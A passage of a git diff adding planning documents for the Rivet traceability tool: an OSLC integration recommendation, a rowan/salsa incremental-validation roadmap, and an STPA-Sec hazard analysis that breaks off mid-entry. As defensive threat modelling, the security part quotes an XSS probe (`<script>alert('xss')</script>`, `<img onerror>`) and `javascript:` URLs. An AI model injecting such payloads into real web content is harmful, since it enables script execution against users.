demonstrates + the pattern for any adapter +- The `SyncDiff` computation is protocol-independent +- The test infrastructure (wiremock-based) is exemplary + +### Cost/Benefit Analysis + +| Investment | Benefit | Priority | +|---|---|---| +| Complete OSLC client (Jazz auth, TRS, RDF/XML, Config Mgmt) | Connect to DOORS Next | Low -- only ~10% of target users have DOORS Next | +| ReqIF import/export (already done) | Exchange with any major ALM tool | **Already shipped** | +| needs.json import (already done) | SCORE adoption | **Already shipped** | +| Polarion REST adapter | Direct Polarion sync | Medium -- if user demand materializes | +| codebeamer REST adapter | Direct codebeamer sync | Medium -- if user demand materializes | + +--- + +## 8. Recommendation + +### Near-Term (Phase 2-3): Keep OSLC as-is, invest elsewhere + +1. **Do not invest further in OSLC** until a concrete customer/user requires + DOORS Next integration. The existing OSLC module is a working prototype + that demonstrates the architecture. It is sufficient for the "we support + OSLC" checkbox. + +2. **Invest in ReqIF robustness** -- this is the universal interchange format + that every major tool supports. Ensure round-trip fidelity with DOORS, + Polarion, and codebeamer exports. Add attribute-type-to-ASPICE-type mapping. + +3. **Invest in needs.json quality** -- this is the SCORE adoption path. + Ensure that SCORE's 50+ need types import cleanly with full link preservation. + +4. **Ship the WASM adapter runtime (FEAT-012)** -- this allows users to write + their own tool-specific adapters without Rivet needing to maintain them. + A WASM adapter for Polarion's REST API or codebeamer's REST API can be + contributed by the community. + +### Medium-Term: Demote DD-001, promote adapter trait + +5. **Update DD-001 status** from `approved` to `superseded` with rationale: + "OSLC remains supported but is not the primary integration strategy. + ReqIF for interchange, needs.json for SCORE, and WASM adapters for + tool-specific REST APIs provide better coverage with less complexity." + +6. **Rename REQ-006 priority** from `should` to `could`. OSLC sync is + a nice-to-have, not a must-have, given the real-world tool landscape. + +### Long-Term: OSLC When Demanded + +7. If a customer requires DOORS Next integration: + - Implement Jazz form-based authentication + - Add TRS support for incremental sync + - Add RDF/XML content negotiation + - Add OSLC Configuration Management for baseline support + - This is a 4-6 week effort for a production-quality client + +8. If a customer requires Polarion or codebeamer integration: + - Build a direct REST adapter (not OSLC) + - Package it as a WASM component + - This is a 1-2 week effort per tool + +### Priority Order for Integration Work + +``` +1. needs.json import [done] -- SCORE adoption +2. ReqIF import/export [done] -- Universal interchange +3. WASM adapter runtime [planned] -- Extensibility +4. Polarion REST adapter [on demand] -- If users request +5. codebeamer REST adapter [on demand] -- If users request +6. OSLC + DOORS Next [on demand] -- If users request +``` + +--- + +## Sources + +### OSLC Specifications +- [OSLC Core 3.0 Overview](https://docs.oasis-open-projects.org/oslc-op/core/v3.0/oslc-core.html) +- [OSLC Specifications Index](https://open-services.net/specifications/) +- [OSLC TRS 3.0](https://docs.oasis-open-projects.org/oslc-op/trs/v3.0/tracked-resource-set.html) +- [OSLC Core 3.0 Changes](https://docs.oasis-open-projects.org/oslc-op/core-3.0-changes/v1.0/pn01/core-3.0-changes.html) + +### Tool OSLC Support +- [DOORS Next OSLC Services](https://www.ibm.com/docs/en/engineering-lifecycle-management-suite/doors-next/7.0.3?topic=function-extending-doors-next-by-using-oslc-services) +- [Polarion REST API](https://developer.siemens.com/polarion/rest-api-spec.html) +- [Polarion OSLC Services](https://docs.sodiuswillert.com/oslc-connect/latest/polarion-oslc-services-for-your-configuration) +- [Codebeamer OSLC Server Guide](https://support.ptc.com/help/codebeamer/r2.1/en/codebeamer/cb_dpt_integration/26334048.html) +- [Jama OSLC Adapter](https://github.com/OSLC/oslc-adapter-jama) + +### Authentication +- [Jazz Authentication Wiki](https://github.com/OSLC/oslc-client/wiki/JazzAuthentication) +- [Jazz OAuth discussion](https://jazz.net/forum/questions/268230/oslc-rootservices-with-oauth1-vs-oauth2) + +### Industry Analysis +- [OSLC Challenges (Jama Software)](https://www.jamasoftware.com/blog/oslc-what-is-it-and-what-are-its-challenges/) +- [OSLC as ALM Integration Standard](https://mgtechsoft.com/blog/what-is-open-services-lifecycle-collaboration/) +- [ReqIF vs OSLC comparison](https://www.se-trends.de/en/reqif-and-systems-engineering/) +- [ReqIF overview (Visure)](https://visuresolutions.com/alm-guide/reqif/) + +### Eclipse SCORE +- [S-CORE Documentation](https://eclipse-score.github.io/score/main/) +- [Eclipse S-CORE GitHub](https://github.com/eclipse-score) +- [Sphinx-Needs](https://www.sphinx-needs.com/) +- [Open-Needs](https://open-needs.org/) diff --git a/docs/plans/2026-03-16-rowan-salsa-completion.md b/docs/plans/2026-03-16-rowan-salsa-completion.md new file mode 100644 index 0000000..c0817fa --- /dev/null +++ b/docs/plans/2026-03-16-rowan-salsa-completion.md @@ -0,0 +1,393 @@ +# rowan + salsa Incremental Validation: Completion Plan + +**Issue:** [#22 — rowan + salsa incremental validation architecture](https://github.com/pulseengine/rivet/issues/22) +**Date:** 2026-03-16 +**Artifacts:** REQ-028, REQ-029, DD-023, DD-024, FEAT-046, FEAT-047, FEAT-048 + +--- + +## 1. Current State Assessment + +### 1.1 What Works Today + +**Layer 1 — rowan CST (MODULE.bazel only):** +- `rivet-core/src/bazel.rs` — Complete rowan-based parser for MODULE.bazel Starlark subset +- ~20 `SyntaxKind` variants (tokens + composite nodes + error recovery) +- Hand-written lexer + recursive-descent parser emitting `GreenNode` +- HIR extraction (`BazelModule`) from CST: `module()`, `bazel_dep()`, overrides +- Error recovery — `load()`, variable assignment, dotted expressions wrapped as `Error` nodes +- 10 tests covering lexer, CST, HIR, error recovery, and realistic input + +**Layer 2 — salsa incremental database:** +- `rivet-core/src/db.rs` — Complete salsa 0.26 database with: + - **Inputs:** `SourceFile` (path + content), `SchemaInput` (name + content), set containers for both + - **Tracked queries:** `parse_artifacts(file)`, `validate_all(sources, schemas)`, `evaluate_conditional_rules(sources, schemas)` + - **Helper functions (non-tracked):** `build_pipeline`, `build_store`, `build_schema` + - **Concrete database:** `RivetDatabase` with `load_schemas()`, `load_sources()`, `update_source()`, `store()`, `schema()`, `diagnostics()`, `conditional_diagnostics()` +- CLI integration: `rivet validate --incremental` and `--verify-incremental` flags +- Verification mode: SC-11 parity check comparing incremental vs sequential pipelines +- 16 database tests covering: empty DB, unlinked/linked artifacts, incremental updates, determinism, add/remove artifacts, conditional rules, rule composition, consistency checks + +**Layer 3 — Supporting infrastructure:** +- `yaml_edit.rs` — Indentation-aware YAML editor (lossless roundtrip for mutations) +- `impact.rs` — Change impact analysis via BFS on link graph +- `validate.rs` — 8-phase validation: `validate_structural()` (phases 1-7) + conditional rules (phase 8) +- `store.rs` — In-memory artifact store with type indexing +- `links.rs` — petgraph-based link graph with forward/backward/broken links + +### 1.2 What Does NOT Work Yet + +1. **CLI does not default to incremental** — `--incremental` is opt-in, sequential pipeline is default +2. **Only `generic-yaml` format supported in salsa path** — STPA, AADL, ReqIF, needs-json formats are skipped +3. **No rowan CST for artifact/schema YAML files** — parsing goes through serde_yaml, no span information +4. **No source location on diagnostics** — `Diagnostic` struct has no file path, line, or column +5. **Store and LinkGraph lack `PartialEq`** — cannot be salsa tracked return types (noted in db.rs comments) +6. **`build_store` and `build_schema` are non-tracked** — pipeline runs twice in `validate_all` + `evaluate_conditional_rules` +7. **No file watching** — incremental database is created fresh each invocation, no warm-cache reuse +8. **No LSP server** — no `tower-lsp` or `lsp-server` integration +9. **No per-file artifact granularity in salsa** — `parse_artifacts` returns `Vec<Artifact>`, not individually tracked artifacts +10. **Impact analysis does not use salsa** — `impact.rs` uses separate diff-based approach + +--- + +## 2. Architecture: LSP-Ready State + +### 2.1 Target Query Graph + +``` + ┌─────────────────┐ + │ File Watcher │ (notify crate) + │ or LSP client │ + └────────┬────────┘ + │ set_content(path, text) + ▼ +┌────────────────────────────────────────────────────────────┐ +│ RivetDatabase │ +│ │ +│ ┌──────────────┐ ┌──────────────┐ │ +│ │ SourceFile │ │ SchemaInput │ salsa::input │ +│ │ path+content │ │ name+content │ │ +│ └──────┬───────┘ └──────┬───────┘ │ +│ │ │ │ +│ ▼ ▼ │ +│ ┌──────────────┐ ┌──────────────┐ │ +│ │parse_artifact│ │ parse_schema │ salsa::tracked │ +│ │ s(file) │ │ (file) │ (per-file) │ +│ └──────┬───────┘ └──────┬───────┘ │ +│ │ │ │ +│ ▼ ▼ │ +│ ┌──────────────┐ ┌──────────────┐ │ +│ │ ArtifactSet │ │MergedSchema │ salsa::tracked │ +│ │ (all files) │ │ (all schemas)│ (aggregates) │ +│ └──────┬───────┘ └──────┬───────┘ │ +│ │ │ │ +│ └───────┬───────────┘ │ +│ ▼ │ +│ ┌─────────────┐ │ +│ │ LinkGraph │ salsa::tracked │ +│ │(+broken refs)│ │ +│ └──────┬──────┘ │ +│ │ │ +│ ┌────────┼────────┐ │ +│ ▼ ▼ ▼ │ +│ ┌──────────┐ ┌─────┐ ┌──────────────┐ │ +│ │structural│ │trace│ │ conditional │ salsa::tracked │ +│ │validation│ │rules│ │ rules │ (per-category) │ +│ └────┬─────┘ └──┬──┘ └──────┬───────┘ │ +│ │ │ │ │ +│ └──────────┼───────────┘ │ +│ ▼ │ +│ ┌──────────────┐ │ +│ │ all_diagnost │ salsa::tracked │ +│ │ ics() │ (top-level) │ +│ └──────┬───────┘ │ +│ │ │ +│ ▼ │ +│ ┌──────────────┐ │ +│ │ Diagnostic │ With file path, │ +│ │ + SourceLoc │ line:col spans │ +│ └──────────────┘ │ +└────────────────────────────────────────────────────────────┘ + │ + ▼ + ┌─────────────────────────┐ + │ LSP / CLI / Dashboard │ + │ textDocument/ │ + │ publishDiagnostics │ + └─────────────────────────┘ +``` + +### 2.2 Key Architectural Properties + +- **Single database instance** shared across CLI (watch mode), dashboard (serve), and LSP +- **File-level granularity** for invalidation: changing one YAML file re-parses only that file +- **Per-category validation** tracked separately: structural, traceability, conditional rules +- **Diagnostic spans** traceable to source locations via rowan TextRange or line:col pairs +- **Same DB serves all consumers**: `rivet validate`, `rivet serve`, `rivet lsp` + +--- + +## 3. Remaining Work Items + +### Phase A: Make Incremental the Default (no rowan required) + +**A1. Derive `PartialEq` for Store and LinkGraph** (~1 day) +- Add `#[derive(PartialEq)]` to `Store`, `LinkGraph`, and all transitive types +- For `LinkGraph`: need `PartialEq` on `ResolvedLink`, `Backlink` (already `Clone + Debug`) +- petgraph `DiGraph` does not implement `PartialEq`; either skip the graph field from comparison or store it separately +- This unblocks making `build_store` and `build_schema` into salsa tracked functions, eliminating the duplicate pipeline execution noted in db.rs + +**A2. Lift `build_store` and `build_schema` to tracked functions** (~0.5 day) +- Currently non-tracked helpers called from both `validate_all` and `evaluate_conditional_rules` +- With PartialEq on return types, these become `#[salsa::tracked]` functions +- Eliminates redundant store/schema assembly on every validation call + +**A3. Add all adapter formats to the salsa path** (~2 days) +- Currently `cmd_validate_incremental` skips sources with format != "generic" / "generic-yaml" +- Need to route STPA, AADL, ReqIF, needs-json through the salsa database +- Strategy: add a `parse_artifacts_with_adapter(db, source, format)` tracked function that dispatches to the correct adapter +- Each adapter's parse result (Vec<Artifact>) is cached per file + +**A4. Source location on Diagnostic** (~1 day) +- Add `source_file: Option<String>` and `source_line: Option<usize>` to `Diagnostic` +- Populate from `Artifact::source_file` (already tracked) and serde_yaml error positions +- No rowan needed — serde_yaml provides line numbers for parse errors; artifact `source_file` provides file paths +- Validate pipeline propagates source_file through to diagnostics + +**A5. Remove `--incremental` flag, make salsa the default** (~0.5 day) +- Keep `--verify-incremental` as a safety check for transition period +- Add `--no-incremental` escape hatch (legacy sequential mode) +- Update CLI tests to use the salsa path +- Gate behind a transition period: `--incremental` prints deprecation notice + +**A6. File-watching warm-cache mode for CLI** (~2 days) +- Add `rivet validate --watch` using the `notify` crate +- Holds `RivetDatabase` in memory between file changes +- On file change: `db.update_source(path, new_content)` then `db.diagnostics()` +- Demonstrates the core incremental value: sub-ms revalidation on warm cache +- This is the simplest proof of salsa's value proposition + +**A7. Integrate salsa into `rivet serve` dashboard** (~2 days) +- Dashboard currently reloads all artifacts on each request +- Share `RivetDatabase` behind an `Arc<RwLock<_>>` in the axum state +- File watcher updates the database; handlers read cached results +- Validation page, stats, graph all query the same warm database + +### Phase B: rowan CST for Artifact YAML Files + +**B1. Design YAML CST SyntaxKind enum** (~1 day) +- Define `YamlSyntaxKind` covering the subset Rivet uses: + - `Root`, `Document`, `MappingEntry`, `SequenceEntry`, `BlockMapping`, `FlowSequence` + - `Key`, `Colon`, `Value`, `Dash`, `Indent`, `Comment`, `Newline`, `ScalarValue`, `StringLit` + - `ArtifactsBlock`, `ArtifactEntry` (higher-level composite nodes) + - `Error` for recovery +- Define `YamlLanguage` implementing `rowan::Language` + +**B2. YAML lexer** (~2 days) +- Indentation-sensitive tokenizer for the artifact YAML subset +- Must handle: block scalars (`>`, `|`), flow sequences (`[...]`), quoted strings, comments +- Produce tokens with exact byte positions for span tracking +- This is more complex than the MODULE.bazel lexer due to indentation significance + +**B3. YAML recursive-descent parser** (~3 days) +- Build `GreenNode` CST from token stream +- Error recovery: partial parse on malformed YAML still produces usable CST +- Must produce `ArtifactEntry` nodes for each `- id:` block +- Span information on every node enables diagnostic-quality error reporting + +**B4. Replace serde_yaml parsing with rowan CST path** (~2 days) +- `parse_generic_yaml()` currently uses serde_yaml +- New path: lex -> parse -> CST -> HIR extraction (Artifact structs) +- HIR extraction walks the CST to produce the same `Vec<Artifact>` output +- serde_yaml path kept as fallback; feature flag or runtime switch + +**B5. Schema file rowan CST** (~2 days) +- Separate `SchemaSyntaxKind` or reuse `YamlSyntaxKind` for schema YAML +- Schema files have a known structure; CST enables better error messages for malformed schemas +- Lower priority than artifact CST — schemas change infrequently + +**B6. Wire rowan spans into Diagnostic** (~1 day) +- `Diagnostic` gains `text_range: Option<rowan::TextRange>` field +- Validation functions that detect errors from CST-parsed artifacts attach the span +- Conversion to line:col via a line index computed from source text + +### Phase C: LSP Server + +**C1. Add `tower-lsp` dependency and server skeleton** (~1 day) +- New crate `rivet-lsp` or module in `rivet-cli` +- Implement `LanguageServer` trait with stub handlers +- `rivet lsp` subcommand starts the server on stdin/stdout + +**C2. `textDocument/didOpen` and `textDocument/didChange`** (~1 day) +- On open: load file content into `RivetDatabase` via `SourceFile::new()` +- On change: `db.update_source(path, new_content)` +- Trigger revalidation, publish diagnostics + +**C3. `textDocument/publishDiagnostics`** (~1 day) +- Convert `Diagnostic` (with source location) to LSP `Diagnostic` +- Map `Severity::Error` -> `DiagnosticSeverity::Error`, etc. +- Publish to client after each revalidation + +**C4. `textDocument/completion`** (~2 days) +- Artifact ID completion in `links:` target fields +- Artifact type completion in `type:` fields +- Link type completion in `links:` type fields +- Schema-aware: only suggest valid target types for a given link type + +**C5. `textDocument/hover`** (~1 day) +- Hover over artifact ID in `links:` shows target artifact summary +- Hover over link type shows schema description +- Hover over artifact type shows type definition + +**C6. `textDocument/definition`** (~1 day) +- Go-to-definition on artifact IDs in link targets +- Jump to the `- id:` line in the target artifact's source file +- Requires `source_file` to be populated on all artifacts + +**C7. VS Code extension packaging** (~2 days) +- Extension activates for `*.yaml` files in projects with `rivet.yaml` +- Ships `rivet` binary, starts `rivet lsp` +- Configuration: schema path, project root +- This is the commercial value play for Eclipse SCORE adoption + +### Phase D: Advanced Incremental Features + +**D1. Per-artifact salsa tracking** (~2 days) +- Currently `parse_artifacts()` returns `Vec<Artifact>` — the entire file +- Add `#[salsa::tracked]` struct `TrackedArtifact` wrapping individual artifacts +- `parse_artifacts()` returns `Vec<TrackedArtifact>` +- Changing one artifact in a multi-artifact file only invalidates that artifact's downstream queries +- Requires careful design: tracked structs need stable identity across re-parses + +**D2. Salsa-powered impact analysis** (~1 day) +- Replace `impact.rs` BFS approach with salsa query invalidation +- "What is impacted by changing file X?" = "What salsa queries would re-execute?" +- salsa does not currently expose its dependency graph externally; may need to track this manually +- Alternative: keep BFS impact but feed it from the salsa-cached link graph + +**D3. Cross-repo incremental validation** (~3 days) +- `externals.rs` already supports cross-repo artifact linking +- External artifacts become `SourceFile` inputs with a "repo:path" key +- File watching spans multiple repo directories +- Invalidation boundary: external changes re-trigger local link validation but not external schema validation + +**D4. Document validation in salsa** (~1 day) +- `validate_documents()` checks `[[ID]]` references in markdown documents +- Add `DocumentInput` salsa input and `validate_document_refs()` tracked function +- Document changes only revalidate affected document references + +--- + +## 4. Migration Strategy + +### Principle: No Breaking Changes + +Every phase is additive. The sequential pipeline (`validate()` in validate.rs) remains functional throughout. The salsa path produces identical results (verified by SC-11). + +### Phase Ordering and Dependencies + +``` +Phase A (Foundation) Phase B (rowan YAML) Phase C (LSP) +━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━ +A1 PartialEq ──┐ B1 SyntaxKind enum C1 server skeleton +A2 tracked fn ─┤ B2 YAML lexer ──┐ C2 didOpen/didChange +A3 all adapters│ B3 YAML parser ─┤ C3 publishDiagnostics +A4 source locs ┤ B4 replace serde┤ C4 completion +A5 default ────┤ B5 schema CST │ C5 hover +A6 --watch ────┤ B6 spans ────────┘ C6 definition +A7 serve ──────┘ C7 VS Code ext + +A must complete ──→ B can start (B needs stable salsa infra) +A must complete ──→ C can start (C needs source locations) +B6 feeds ─────────→ C3 (spans make LSP diagnostics precise) +``` + +### Transition Timeline + +| Milestone | Items | Key Deliverable | +|-----------|-------|----------------| +| **v0.2.0** | A1-A5 | Incremental is default; all adapters supported | +| **v0.3.0** | A6-A7, B1-B3 | Watch mode, dashboard integration, YAML CST prototype | +| **v0.4.0** | B4-B6, C1-C3 | rowan-parsed artifacts, basic LSP with diagnostics | +| **v0.5.0** | C4-C7, D1-D2 | Full LSP, VS Code extension, per-artifact tracking | +| **v1.0.0** | D3-D4 | Cross-repo incremental, document validation | + +--- + +## 5. New Artifacts Needed + +### Requirements + +| ID | Title | Rationale | +|----|-------|-----------| +| REQ-033 | Source location tracking on validation diagnostics | Diagnostics without file:line are unusable for LSP and large projects | +| REQ-034 | File-watching incremental validation mode | Core value proposition of salsa — sub-ms revalidation on file change | +| REQ-035 | YAML lossless CST with rowan | Enables error recovery, span-based diagnostics, and LSP features | +| REQ-036 | Language Server Protocol support for artifact YAML | IDE integration for SCORE adoption; commercial VS Code extension play | + +### Design Decisions + +| ID | Title | Rationale | +|----|-------|-----------| +| DD-031 | YAML CST SyntaxKind design for artifact/schema files | The YAML subset used by Rivet is small enough for a hand-written parser but needs indentation sensitivity | +| DD-032 | tower-lsp over lsp-server for Rivet LSP | tower-lsp is async and composable with axum; lsp-server is sync. spar could go either way but Rivet already has tokio | +| DD-033 | notify crate for file watching in CLI and dashboard | Cross-platform file watching; same approach as rust-analyzer | + +### Features + +| ID | Title | Links | +|----|-------|-------| +| FEAT-053 | Source locations on all validation diagnostics | satisfies REQ-033 | +| FEAT-054 | `rivet validate --watch` with warm salsa cache | satisfies REQ-034, implements DD-024 | +| FEAT-055 | YAML rowan CST parser for artifact files | satisfies REQ-035, implements DD-031 | +| FEAT-056 | `rivet lsp` Language Server Protocol implementation | satisfies REQ-036, implements DD-032 | +| FEAT-057 | VS Code extension for Rivet artifact YAML | satisfies REQ-036 | +| FEAT-058 | salsa integration in `rivet serve` dashboard | satisfies REQ-029, implements DD-024 | + +### STPA Artifacts (extend existing) + +The following existing STPA artifacts already cover incremental validation safety: +- **H-9:** Incremental validation returns stale results (hazard) +- **SC-11:** Incremental must equal full validation (safety constraint) +- **UCA-C-10..C-14:** Incremental validation UCAs +- **CC-C-10..C-14:** Causal chain for incremental errors + +New loss scenario needed: +- **LS-NEW:** LSP server publishes stale diagnostics after rapid file edits due to race between file watcher and salsa query execution + +--- + +## 6. Risks and Mitigations + +| Risk | Impact | Mitigation | +|------|--------|------------| +| YAML indentation parsing is hard to get right | B2-B3 take longer than estimated | Start with a minimal subset (artifact files only), reuse yaml_edit.rs knowledge | +| salsa 0.26 API instability | API changes break db.rs | Pin to exact version; salsa 0.26 is stable (used by spar, rust-analyzer uses fork) | +| PartialEq on petgraph DiGraph | A1 blocked — DiGraph has no PartialEq | Store the graph behind an opaque wrapper; compare by node/edge counts or skip graph from PartialEq | +| Per-artifact tracking identity issues | D1 correctness — re-parse changes artifact identity | Use artifact ID as the salsa identity key; handle ID renames as remove+add | +| LSP adoption requires VS Code extension | C7 is cross-ecosystem work (TypeScript) | Start with a minimal extension; existing YAML LSP extensions can be adapted | + +--- + +## 7. Success Criteria + +1. **`rivet validate` defaults to incremental** — no `--incremental` flag needed +2. **SC-11 always passes** — `--verify-incremental` confirms parity on every CI run +3. **`rivet validate --watch`** shows sub-10ms revalidation on file change (warm cache) +4. **`rivet serve` dashboard** uses shared salsa database — no full reload per request +5. **`rivet lsp`** publishes diagnostics with file:line:col accuracy +6. **VS Code extension** provides completion, hover, and go-to-definition for artifact YAML +7. **All adapter formats** (generic, stpa, aadl, reqif, needs-json) route through salsa + +--- + +## 8. Relation to Phase 3 Workstreams + +This plan is workstream 7 ("rowan + salsa incremental validation") from the +[Phase 3 parallel workstreams design](2026-03-14-phase3-parallel-workstreams-design.md). + +It intersects with: +- **Workstream 3** (CLI mutation safety) — mutations should invalidate the salsa cache +- **Workstream 4** (dashboard) — shared salsa database for serve +- **Workstream 6** (cross-repo) — external artifacts as salsa inputs +- **Workstream 8** (SCORE adoption) — LSP/VS Code extension is a key selling point diff --git a/docs/plans/2026-03-16-stpa-sec-analysis.md b/docs/plans/2026-03-16-stpa-sec-analysis.md new file mode 100644 index 0000000..c9da12d --- /dev/null +++ b/docs/plans/2026-03-16-stpa-sec-analysis.md @@ -0,0 +1,867 @@ +# STPA and STPA-Sec Fresh Analysis Report + +**Date:** 2026-03-16 +**Scope:** Full Rivet codebase at current state (branch `feat/compound-layout`) +**Method:** Fresh STPA (Steps 1-4) + STPA-Sec extension + OSLC lifecycle lens + +--- + +## Executive Summary + +This report presents a fresh STPA analysis performed against the current Rivet codebase, comparing findings against the existing STPA artifacts in `safety/stpa/`. The analysis identified: + +- **0 new losses** needed (existing 6 losses remain complete) +- **5 new hazards** (H-13 through H-17) for components added since the last analysis +- **5 new system constraints** (SC-15 through SC-19) +- **3 new controllers** added to the control structure (CTRL-EXPORT, CTRL-YAML-EDIT, CTRL-SALSA) +- **15 new UCAs** across export, document rendering, commit traceability, and WASM runtime +- **14 loss scenarios** needed (8 for existing UCAs lacking them + 6 for new UCAs) +- **6 STPA-Sec findings** with missing mitigations +- **3 OSLC lifecycle gaps** + +--- + +## Part 1: Fresh STPA Analysis + +### Step 1: Loss Completeness Review + +The existing 6 losses were evaluated against all new capabilities: + +| Loss | Title | Still Complete? | Notes | +|------|-------|-----------------|-------| +| L-1 | Loss of traceability integrity | Yes | Export, markdown rendering, and document validation all create derivative representations of traceability data. HTML export integrity falls under L-1 (incorrect traceability data in reports) and L-2 (compliance evidence). | +| L-2 | Loss of compliance evidence | Yes | HTML exports used as audit evidence are covered: an incorrect export is misleading compliance evidence. | +| L-3 | Loss of data sovereignty | Yes | YAML mutation and cross-repo sync are data sovereignty concerns. | +| L-4 | Loss of engineering productivity | Yes | Salsa cache staleness and build-system misparsing waste engineering time. | +| L-5 | Loss of safety assurance | Yes | All new hazards eventually chain to L-5 through traceability gaps. | +| L-6 | Loss of audit trail | Yes | YAML mutation without attribution is an audit trail concern. | + +**Verdict: No new losses needed.** The existing 6 losses adequately cover all new capabilities. The requested losses for "export integrity," "incremental validation correctness," and "formal proof validity" are already subsumed by L-1, L-2, and L-5 respectively. + +### Step 2: New Hazards + +The following hazards were identified for code added since the last STPA analysis. Note: the user requested IDs H-13+ but some of the proposed hazards (XSS via markdown, salsa staleness, build-system misparsing) overlap with existing hazards. Where overlap exists, I note the existing hazard and add only genuinely new hazards. + +**Already covered by existing hazards:** + +- "salsa cache returns stale results after schema change" -- **H-9** and sub-hazards H-9.1, H-9.2 +- "build-system provider misidentifies dependency versions" -- **H-11** and sub-hazards H-11.1, H-11.2 +- "impact analysis misses transitively affected artifacts" -- subsumable under **H-1** (stale cross-references) and **H-3** (incorrect coverage metrics) + +**New hazards:** + +```yaml +# Proposed additions to safety/stpa/hazards.yaml + + - id: H-13 + title: Rivet document renderer produces HTML containing unescaped artifact content + description: > + The markdown-to-HTML renderer in document.rs processes artifact + descriptions, titles, and field values into HTML output for the + dashboard and document views. If artifact content contains HTML + entities, script tags, or event handler attributes that are not + properly escaped, the rendered output enables cross-site scripting + (XSS) in the dashboard. In a worst-case environment where the + dashboard is used during an audit review or shared via screen + recording, injected scripts could alter displayed traceability + data, exfiltrate session information, or modify the visual + presentation of compliance metrics. + losses: [L-1, L-2, L-3] + + - id: H-14 + title: Rivet WASM adapter executes untrusted code that corrupts import results + description: > + The WASM runtime (wasm_runtime.rs) loads and executes third-party + adapter components. A compromised or buggy WASM adapter could + return fabricated artifacts, modify link targets, inject additional + artifacts, or silently drop artifacts during import. The host trusts + the adapter's output without independent verification against the + source data. In a worst-case environment where adapters are + distributed as binary components without source review, a supply + chain attack could introduce falsified traceability data. + losses: [L-1, L-3, L-5] + + - id: H-15 + title: Rivet commit traceability analysis produces false coverage from misidentified artifact references + description: > + The commit analysis engine (commits.rs) extracts artifact IDs from + git trailer values using pattern matching (PREFIX-DIGITS). False + positives occur when non-artifact strings match this pattern (e.g., + "ISO-26262" parsed as artifact ID "ISO-26262", or "SHA-256" parsed + as "SHA-256"). False negatives occur when artifact IDs use + non-standard formats (e.g., "H-1.2", "UCA-C-10") that the regex + does not match. Both inflate or deflate commit-artifact coverage + metrics, misrepresenting implementation completeness. + losses: [L-1, L-2] + + - id: H-16 + title: Rivet dashboard serves stale data after hot-reload fails silently + description: > + The dashboard server (serve.rs) provides a reload endpoint that + re-reads all artifact files, schemas, and documents from disk. If + the reload encounters a parse error in one YAML file, it may fail + and leave the in-memory state unchanged without notifying the user. + The dashboard continues serving the pre-reload state while the + user believes they are viewing current data. In a worst-case + environment where an engineer has just fixed a validation error + and reloaded, they see the old (passing) state and conclude + their fix is working when it actually introduced a new error. + losses: [L-1, L-3, L-4] + + - id: H-17 + title: Rivet cross-repo sync clones arbitrary git repositories specified in rivet.yaml + description: > + The externals module (externals.rs) executes `git clone` and + `git fetch` commands against URLs specified in the project's + rivet.yaml configuration. A malicious or compromised rivet.yaml + could specify a git URL pointing to a hostile repository. The + clone/fetch operation may trigger git hooks, download large + volumes of data, or overwrite local state in the cache directory. + In a worst-case environment where rivet.yaml is modified in a + supply chain attack, the sync command becomes a vector for + arbitrary code execution via git hooks. + losses: [L-3, L-5] +``` + +**Sub-hazards for H-13:** + +```yaml +sub-hazards: + - id: H-13.1 + parent: H-13 + title: Rivet dashboard renders artifact descriptions containing script injection + description: > + An artifact's description field contains `<script>` tags or + `onerror` attributes. The dashboard's HTML rendering pipeline + includes the content without sanitization in the artifact detail + view, enabling script execution in the viewer's browser. + + - id: H-13.2 + parent: H-13 + title: Rivet document renderer passes markdown image URLs without validation + description: > + A markdown document references an image with a `javascript:` or + `data:` URL scheme. The parse_markdown_link function in document.rs + only allows http/https/# URLs, but the img tag rendering path may + not apply the same restriction, enabling script injection via + crafted image sources. +``` + +### Step 3: New System Constraints + +```yaml +# Proposed additions to safety/stpa/system-constraints.yaml + + - id: SC-15 + title: Rivet must HTML-escape all artifact content before rendering in dashboard or document views + description: > + Every artifact field value (title, description, custom fields) and + document body content must be HTML-escaped before insertion into + HTML output. Script tags, event handlers, and other HTML injection + vectors must be neutralized. The escaping must occur at the output + boundary (rendering), not at the input boundary (parsing), to + ensure defense-in-depth. + hazards: [H-13] + + - id: SC-16 + title: Rivet must validate WASM adapter outputs against the source data independently + description: > + After a WASM adapter returns imported artifacts, the host must + verify that: (a) the number of returned artifacts is consistent + with the source data size, (b) all returned artifact IDs conform + to expected patterns, (c) no artifact IDs were injected that do + not correspond to source records. Schema validation alone is + insufficient because a compromised adapter could produce + schema-conforming but fabricated artifacts. + hazards: [H-14] + + - id: SC-17 + title: Rivet commit analysis must validate extracted artifact IDs against the known artifact set before counting coverage + description: > + The commit traceability engine must not count artifact references + that do not resolve to known artifacts in the store as coverage. + The is_artifact_id() heuristic must be supplemented with a + store.contains() check. Unresolved references must be reported + as broken refs, not counted as coverage. + hazards: [H-15] + + - id: SC-18 + title: Rivet dashboard must report reload failures and indicate stale data state + description: > + When a dashboard reload fails (due to YAML parse errors, schema + load failures, or filesystem issues), the server must: (a) return + an error response to the reload request, (b) display a visible + "stale data" banner on all dashboard pages until a successful + reload occurs, (c) log the specific error that caused the reload + failure. + hazards: [H-16] + + - id: SC-19 + title: Rivet must not execute git clone/fetch against untrusted URLs without user confirmation + description: > + The externals sync operation must validate git URLs against an + allowlist or require explicit user confirmation before cloning + new repositories. Git clone operations must disable hooks in the + cloned repository (--config core.hooksPath=/dev/null) to prevent + arbitrary code execution. + hazards: [H-17] +``` + +### Step 4: New UCAs + +#### 4a. UCAs for Existing Controllers Needing Extension + +**CTRL-DASH (Dashboard) — Document Rendering:** + +```yaml +# Additional dashboard UCAs for document/HTML rendering + + - id: UCA-D-3 + description: > + Dashboard renders artifact description content containing HTML + injection without escaping. + context: > + An artifact's description field contains `<script>alert('xss')</script>` + or `<img onerror="...">`. The dashboard detail view renders this + content as raw HTML. + hazards: [H-13] + rationale: > + Script injection in the dashboard compromises the integrity of + all displayed traceability data for the current session. + + - id: UCA-D-4 + description: > + Dashboard does not display reload errors when hot-reload fails. + context: > + User clicks reload, a YAML parse error occurs in one file, + but the dashboard returns a success response and continues + showing the old state. + hazards: [H-16] + rationale: > + User believes they are viewing current data when the dashboard + is serving stale state from before the edit. +``` + +**CTRL-CORE — Commit Traceability:** + +```yaml +# Additional core UCAs for commit traceability + + - id: UCA-C-18 + description: > + Core commit analysis extracts false-positive artifact IDs from + trailer values that match the PREFIX-DIGITS pattern but are not + actual artifact identifiers. + context: > + A commit trailer contains "Implements: ISO-26262 compliance" and + the pattern matcher extracts "ISO-26262" as an artifact ID. + hazards: [H-15] + rationale: > + 